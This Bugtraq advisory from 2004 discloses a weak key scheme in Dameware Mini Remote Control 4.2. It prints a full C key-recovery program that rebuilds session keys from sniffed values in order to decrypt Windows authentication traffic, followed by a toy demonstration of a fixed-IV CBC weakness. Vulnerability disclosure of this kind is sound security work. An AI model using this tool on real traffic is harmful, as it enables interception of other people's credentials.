Bugtraq mailing list archives

Dameware Mini Remote Control Version 4.2 – Weak Key Agreement Scheme


From: ax09001h <ax09001h () hotmail com>
Date: 30 Apr 2004 18:26:46 -0000



Title: Dameware Mini Remote Control Version 4.2 – Weak Key Agreement Scheme

Versions:       Dameware Mini Remote Control Version 4.2
                

Vulnerability: The latest version of Dameware's Mini Remote Control System uses a weak key agreement scheme.  The
scheme consists of the sharing of pointers into a fixed key lookup table.  Both the client and the server have access
to a key lookup table (KLT) consisting of 1000 32-bit values.  Prior to encrypting traffic, the server sends the
client a series of 32-bit integers; call it the key index table (KIT).  For the sake of description, let's call the
indices klt_idx[4], an array of 4 32-bit integers.  The klt_idx are set as follows:

klt_idx[0] = KIT[100];
klt_idx[1] = KIT[4];
klt_idx[2] = 42;
klt_idx[3] = KIT[37];

The actual session key is then constructed as 4 32-bit integers, sk[4] as follows.

        sk[0] = KLT[klt_idx[0]];
        sk[1] = KLT[klt_idx[1]]; 
        sk[2] = KLT[klt_idx[2]];
        sk[3] = KLT[klt_idx[3]];

This of course produces 0 bits of security.

They proceed to correct the Electronic Code Book mode of encrypting other authentication packets by using Blowfish in
cipher block chaining mode, keyed with the key constructed above, with an IV = 0.

Exploit:

/*

        dwgenkey.c                      dameware generate key program.

                                        this function mimics the dameware
                                        key generation algorithm used to 
                                        pass encrypted windows authentication 
                                        across between client and server
                        

                                        ax09001h () hotmail com


*/


#include <stdio.h>
#include <stdlib.h>


unsigned int    KLT [1000] = 
{
        0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
        0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
        0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29,     0x48A20FA2, 
        0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB,     0xBC2B83CD, 
        0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058,     0x5474C05, 
        0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A,     0xCFA8D725, 
        0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762, 
        0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88, 
        0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B, 
        0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE, 
        0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096, 
        0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089, 
        0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E, 
        0xB9F8AF1C, 0xF797E46C, 0x5F2F339D,     0xB792AB5F, 0x462050F7, 0xF922EDBD, 
        0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821, 
        0xAA69288,  0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23, 
        0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E, 
        0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3, 
        0xFD572127,     0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7, 
        0x1093FA43,     0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
        0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
        0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
        0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
        0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
        0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
        0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22,     0x7A153138, 
        0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E,     0x2E464810, 
        0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0, 
        0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642, 
        0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7, 
        0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA, 
        0xE5209EFB, 0x1A4E0702, 0xD8B6C71,      0xDA3EAE89, 0xA1A00078, 0xB55B5C3E, 
        0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D, 
        0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E, 
        0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1, 
        0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244, 
        0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86, 
        0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E, 
        0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B, 
        0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC, 
        0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0, 
        0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9, 
        0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C, 
        0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6, 
        0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61, 
        0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4, 
        0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF, 
        0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
        0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
        0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
        0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6,     0xF53E8558, 
        0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C, 
        0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8, 
        0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809, 
        0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856, 
        0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB, 
        0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9, 
        0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405, 
        0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B, 
        0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D, 
        0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942, 
        0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04, 
        0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D, 
        0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621, 
        0xC421154,  0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
        0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
        0x7C07054,  0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9,  0x27C3B146,
        0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
        0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
        0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
        0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81,     0x98E93630, 
        0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8,     0xAF2A72E8, 
        0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601, 
        0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6,     0xA3C182A3, 
        0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2, 
        0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A,  0xA45A497, 
        0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C, 
        0x67DEDD8,  0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1, 
        0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2, 
        0x76E7D2A6, 0x536501F,  0xC77CA12B,     0x5E6E2842, 0x9896F26C, 0x2BC45D27, 
        0xE2FF89C7, 0x11FBC8C,  0x252652BD,     0x61AA26A4, 0xF3DF28A,  0xAFB90C39, 
        0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE,     0x2630C3A2, 0xC0F995BC, 0x27677058, 
        0x49E5FA9C, 0x3B66C518, 0x7654283D,     0xB8305341, 0x72E94CF,  0x3E181088, 
        0x9F721122, 0xC536D545, 0x8BD48FE7,     0xA0899C0F, 0x950D4B9C, 0xCDFA8F86, 
        0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C, 
        0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C, 
        0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D, 
        0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4, 
        0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B, 
        0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990, 
        0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265,  0x384C4B56, 
        0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9, 
        0xC144F12E,     0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3, 
        0x6B32E419,     0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
        0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA634,
        0x95F72F6A, 0x17E27035, 0xC91082D7, 0x5F2BEE2F, 0x68EE3EA8, 0xD2238F52,
        0xD622F757, 0x2CE5FE15, 0x4DD2E862, 0xD8B78679, 0xA068E1E3,     0x9DA3764, 
        0xA46DC043, 0xEF5A319E, 0x3CA47D7,  0x15D66FBD, 0x70FD11C5,     0xEB93FAE7,
        0xE0C76863, 0xCA8DB56B, 0x549B7A6D, 0x7830B60E, 0x63EC6EA1, 0xC5F8C700,
        0x25F6631D, 0x81C74AA6, 0x1FEBAAA6, 0x50FACED0, 0xF3B16C0C, 0x42D24E7D,
        0x87FAB7B4, 0x8998222D, 0xCF13B716, 0xD77799C7, 0xF19B6249, 0xCC56A6E6,
        0x3D87AC7E, 0x2A73259B, 0x5503BDFD, 0xD95F05F1, 0xC01BCD8B, 0x6F9C96E2,
        0x6B2D997,  0xB3F54B81, 0x3139AC71, 0x504DC220, 0x9D4C8848, 0xFAB47FBF, 
        0xF910278A, 0x1AAD13D7, 0x667DC201, 0x2A2AE786, 0x845C31FA, 0x27F4E75, 
        0x413D1796, 0x9236D7BC, 0x8FAC3425, 0x866DC291, 0x97796BE4, 0x3581CDF, 
        0xA313B372, 0x57907BA0, 0x981BE778, 0x67DA3DF6, 0x947D9EC1, 0xCFA65CA6,
        0x6261BF74, 0xD818DCB0, 0x30CBA2D1, 0x1A41B299, 0x33317112, 0x424A6EB6,
        0x516FA0C5, 0x1B0EBEDC, 0xDDAB9664, 0xCBDE0912, 0x8E567CFA, 0xA1C9DAEB,
        0x1C7DB358, 0xA144F1FE, 0x2B7FEE15, 0xB5CA6B77, 0x2B1655B3, 0xFF3D846B,
        0x2B0B907A, 0xC0948E5C, 0x608A1725, 0x2FF6781C, 0x555C1AAC, 0xDB70AD3E,
        0xDFD488CA, 0x2170C025, 0x576C15E7, 0x5F447947, 0x30B8108F, 0xBB9ADE84,
        0x8808C71A, 0xB760EA1F, 0x4E503018, 0x534BA5B5, 0xCDF5FE07, 0xEC48167F,
        0xD1E7227A, 0xCD998A1,  0xE754F192,     0x2727BFFF, 0xBFB0694D, 0xF454B618, 
        0x63EBFF6,      0x30BD09D0, 0x927F98B2, 0x6F96ED41, 0xC249BFB1, 0x8E07ED96, 
        0x6D3B63AE, 0xC661C79A, 0x574D1947,     0x691AC06A, 0x1241A695, 0xDA814574, 
        0xF520C090, 0x7AAFF6DF, 0x6314F55A,     0x99BF992E, 0x4C2350AA, 0x16C970F2, 
        0xBC5DAF3D, 0x948FEE79, 0xCF038D84,     0x94916A6F, 0x67C9C446, 0x769D41FC, 
        0x7AB8FC6B, 0xAC88CDC6, 0x2632E0F2,     0x7A39D045, 0xE07D60C3, 0x627F0F1B, 
        0x6C9E9B6F, 0x5443B96A, 0xB42AEFB6,     0x7D971F39, 0x1E543216, 0xAB1F0A, 
        0x4B0E8966, 0xBE389C53, 0xE8143B78,     0x845EEA38, 0x1BC4E0C1, 0xC33854ED, 
        0xEBE30DBC, 0xAE0FFAD8, 0x545B28DB, 0x64CB5928, 0x516227C9, 0xDA7DED1B, 
        0x60957017, 0xEF42F6C4, 0xD1D44B1A, 0x6E9DCDB0, 0x8089B1C8, 0x78229E35, 
        0xE65C19DF, 0xBE4926F8, 0x22F282DB, 0x1DAD0725, 0x1F1E94A5, 0xE1F97ACD, 
        0x7EA0006F, 0x94F6FBDD, 0x26214BED, 0xFC7FF0CC, 0xA2393542, 0xB472E61E, 
        0x301E470,  0x36FD7EE5, 0xF179CB04, 0x18CC9785, 0x2E0F60B2, 0x13112B9B, 
        0x21CE96F9, 0xCF50766C, 0x420F7FBE, 0x3062489,  0xA2E5956D, 0x38AF92C9, 
        0x826DB438, 0xCA1D08C7, 0x2CAA1940, 0xCCCDF1C,  0x9C3FE51D, 0x1ECDC7D8, 
        0x909C80DE, 0x646BFFA9, 0x6318213D, 0x32C14EFF, 0xC8351460, 0x6D81B09, 
        0xC3BA2047, 0x4078D5B1, 0x7AF40C50, 0x7128296,  0xB57DE4BE, 0xBD35598, 
        0x2256C607, 0xB6177952, 0xF276EF63, 0x55D787AF, 0x2267BE3B, 0x48B1B069, 
        0x5CF704D4, 0x4C1B3376, 0xDF687016, 0x68B38FE2, 0x19E808B4, 0x2FFF302B, 
        0x78BD0181, 0xBC4A03F0, 0x98562262, 0xB9797F02, 0x1E7B17D3, 0x61B031D1, 
        0x8E69A1F8, 0x32863D7E, 0x8140AA57, 0xD42FB27E, 0x825645B2, 0x7E0AC685, 
        0x1752B306, 0xEF07F2F7, 0xF031981C, 0xA061064D, 0xE118F8AB, 0xCCE37EF9, 
        0x6AEBFCF7,     0xEEED8568, 0x98A86406, 0x6B7D3AAA, 0xAD068483, 0x2E71AAF2, 
        0x1800DB2E,     0xA98F5949, 0xE111A890, 0x17E02EB3, 0xC6B72970, 0x15067E3E,
        0xB2291D61, 0x6008098F, 0xDAD360FF, 0xD19E95D,  0xBEFD0EC7,     0x5F4C9183,
        0xCB5EAB77, 0xC6A1FB76, 0xD71F95D2, 0xFC7FDB6E, 0x80DD91AB, 0x8E322B21,
        0xAAE68069, 0xC2CEB8A5, 0xC89D1CA1,     0x931577D8, 0x4D6F1725, 0xC3E0EC5A, 
        0x7F94E8FB, 0x3E008B9C, 0x1DC1680D,     0xF99F3782, 0xFD54CD8F, 0x97722074, 
        0xE0F06DB7, 0xF9B44EE8, 0xFBF70D53, 0xDF3B605F, 0xB6CDC64D, 0xD5CC9449, 
        0x75A2DC1A,     0x62C4D3AE, 0x6FB02ED3, 0x55F97BF8, 0x86179194, 0x67488E2, 
        0x1071C487,     0x5D196F3C, 0x9FCDBA5E, 0x994036B,  0x538C2B87, 0xE3CA84F4, 
        0xE6D29642,     0xAA8E0B45, 0xF3557176, 0x403E0041, 0xF1056A7D, 0xB163CC68,
        0xB00F9A47, 0x6E13B87,  0x93C25E4F, 0x4BFCEC42, 0xD4AAE81,  0x9FA016C,
        0x8A842986, 0xDC301A3B, 0xA43D96F1, 0x1DFB9302, 0x4D9F9AAE, 0x6A7416FF,
        0xCF2E7C59, 0x76478C25, 0xAD4A317E, 0x8985000D, 0x38FED22B, 0xFD0944A9,
        0xD2A319D1, 0x9D9ABC55, 0x2A1F76B0, 0x9BCDAA0D, 0x2DE5847,  0xDF44583C,
        0xF4CEBE0F, 0x6733F2CD, 0x5F8A8DA5, 0x4526D975, 0xB6E458B7, 0x4D2BB1A6,
        0x137AA2C6, 0x6DDCFC23, 0xA41CE8B6, 0x4A442E7E, 0xFB7A0A5,  0xF7808F43,
        0x5D10DDD6, 0xA52D6396, 0x61574048, 0x8923CBA2, 0x6436DD12, 0x49266343,
        0xF1787AAB, 0xC467FB1A, 0x25278A4B, 0x2181A43C, 0xC4EAF160,     0x88A9E6BB, 
        0xC7AF0933, 0x8002BA84, 0xB134654,      0x4A015A8E, 0xEC16E6AF, 0xEC154BE3, 
        0x10FE786A, 0x8F5EA3E7, 0x1A92D7C4, 0xD90FE65A, 0x6CF77EA3,     0x394EB8F9, 
        0x573B2AF9, 0xD6396AFA, 0xCC79F56,      0xC36AA7DB, 0x88B6126E, 0x3BBD5F44, 
        0xA8086DC7, 0x9437E86F, 0xA8A72E5F, 0x204CC584, 0x508AAC96,     0xEACC6EF1, 
        0x981E7A1A, 0xA16DF863, 0xAA9FD0B9, 0x22F6D8DA, 0xA05A7581, 0xD9782911, 
        0xCCBDFFD7, 0x7E3C9F4E, 0x96FC6F3D,     0x7113F1FC, 0xD312E7BD, 0x6AD91B0F, 
        0x394E21FA, 0x47F135EE, 0xA24E4FE5,     0x2C7A682E, 0x185161A9, 0x6AF00259, 
        0xD411424D, 0xB207A9E1, 0xF4E482E7,     0x6173F9FE, 0xE3CEC249, 0xB63D392B, 
        0x3FE5BEDF, 0x82C2E736, 0x69FF3BA2,     0x9D219633, 0x8DA0F96F, 0xDFCCCB9, 
        0xC4A6A06F, 0xBC536DF7, 0xE76CC1F,      0x452F4BD1, 0x1BC9BA19, 0x4427617C, 
        0x4410511D, 0xD2B3643B, 0x90066BE6,     0x9B03705C, 0xF144AE,   0x5017F6E5, 
        0x2EC8DA0,      0xC4733AAE, 0xD2CB991D, 0xFF695547, 0xE662D331, 0xA374917C, 
        0xB53B62CC, 0xBF135D1,  0x3240CEBA, 0xB406298B, 0x5065FE42, 0x9BB538CC, 
        0xC89AF46A, 0x97FB692D, 0xB0123130, 0xED5BFFB1, 0x2CC09D9,      0x68E4E060, 
        0xB117D6E7, 0xBA9CE7B3, 0xB731559B, 0x876FF1D
};

/* print command-line help; returns 0 so main() can return it directly */
int             usage()
{
        printf("USAGE: dwkeygen INDEX0 INDEX1 INDEX2\n");
        printf("\t INDEX0 is the hexadecimal value of 101st unsigned int\n");
        printf("\t        in the server to client message that precedes\n");
        printf("\t        the encrypted windows authentication packets\n");
        printf("\t INDEX1 is the hexadecimal value of 5th unsigned int\n");
        printf("\t        in the server to client message that precedes\n");
        printf("\t        the encrypted windows authentication packets\n");
        printf("\t INDEX2 is the hexadecimal value of 38th unsigned int\n");
        printf("\t        in the server to client message that precedes\n");
        printf("\t        the encrypted windows authentication packets\n");
        printf("OUTPUT: dameware encryption key\n");
        return 0;
}

int main(int argc, char **argv)
{
        int             i;
        unsigned int    sk[4];
        unsigned long   klt_idx[4];

        if(argc!=4)     {       return usage(); }

        /* the three KIT values are given in hex; the third index is fixed */
        klt_idx[0] = strtoul(argv[1], NULL, 16);
        klt_idx[1] = strtoul(argv[2], NULL, 16);
        klt_idx[2] = 42;
        klt_idx[3] = strtoul(argv[3], NULL, 16);

        /* reject indices outside the table instead of reading out of bounds */
        for(i=0;i<4;i++){
                if(klt_idx[i] >= sizeof(KLT)/sizeof(KLT[0])){
                        fprintf(stderr, "index %d (0x%lX) is outside the KLT\n", i, klt_idx[i]);
                        return 1;
                }
        }

        /* each session key word is a direct lookup into the fixed table */
        for(i=0;i<4;i++){
                sk[i] = KLT[klt_idx[i]];
                printf("%08X ", sk[i]);
        }
        printf("\n");

        return 0;
}

Recommendation:  The general recommendation is to use another software package.  This program seems to be riddled with 
poor software practices and a lack of understanding of security principles.
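
Added example (not part of the original post, and not Dameware's code): the advisory notes that Blowfish is used in cipher block chaining mode with an IV = 0. The sketch below shows why a fixed IV matters independently of the key problem: CBC becomes deterministic, so two messages that begin with the same blocks produce the same leading ciphertext blocks. Assumptions: the block cipher is a toy 64-bit Feistel construction standing in for Blowfish, and the key, messages and function names are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Toy 64-bit Feistel cipher standing in for Blowfish (NOT Blowfish, NOT
 * secure); only the 64-bit block size and the CBC chaining matter here. */
static uint64_t toy_encrypt_block(uint64_t block, const uint32_t sk[4])
{
    uint32_t l = (uint32_t)(block >> 32), r = (uint32_t)block;
    for (int round = 0; round < 8; round++) {
        uint32_t f = (r ^ sk[round & 3]) * 0x9E3779B1u;
        uint32_t t = l ^ f ^ (f >> 15);
        l = r;
        r = t;
    }
    return ((uint64_t)l << 32) | r;
}

/* CBC: C[i] = E(P[i] XOR C[i-1]), with C[-1] = IV. */
static void cbc_encrypt(const uint64_t *pt, uint64_t *ct, size_t n,
                        const uint32_t sk[4], uint64_t iv)
{
    uint64_t prev = iv;
    for (size_t i = 0; i < n; i++)
        ct[i] = prev = toy_encrypt_block(pt[i] ^ prev, sk);
}

/* Constructed sample data: two 3-block messages differing only in block 3. */
static const uint32_t SAMPLE_SK[4] = { 0x11111111u, 0x22222222u, 0x33333333u, 0x44444444u };
static const uint64_t MSG_A[3] = { 0x0102030405060708ULL, 0x1112131415161718ULL, 0xAAAAAAAAAAAAAAAAULL };
static const uint64_t MSG_B[3] = { 0x0102030405060708ULL, 0x1112131415161718ULL, 0xBBBBBBBBBBBBBBBBULL };

/* Leading ciphertext blocks that repeat across the two messages under iv_a / iv_b. */
static size_t repeated_prefix_blocks(uint64_t iv_a, uint64_t iv_b)
{
    uint64_t ca[3], cb[3];
    size_t i = 0;
    cbc_encrypt(MSG_A, ca, 3, SAMPLE_SK, iv_a);
    cbc_encrypt(MSG_B, cb, 3, SAMPLE_SK, iv_b);
    while (i < 3 && ca[i] == cb[i])
        i++;
    return i;
}

int main(void)
{
    printf("IV = 0 for both messages: %zu repeated blocks\n", repeated_prefix_blocks(0, 0));
    printf("distinct per-message IVs: %zu repeated blocks\n", repeated_prefix_blocks(0x1111ULL, 0x2222ULL));
    return 0;
}
```

A fresh unpredictable IV per message removes the repeated-prefix leak, but it does nothing for the key agreement weakness described above.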


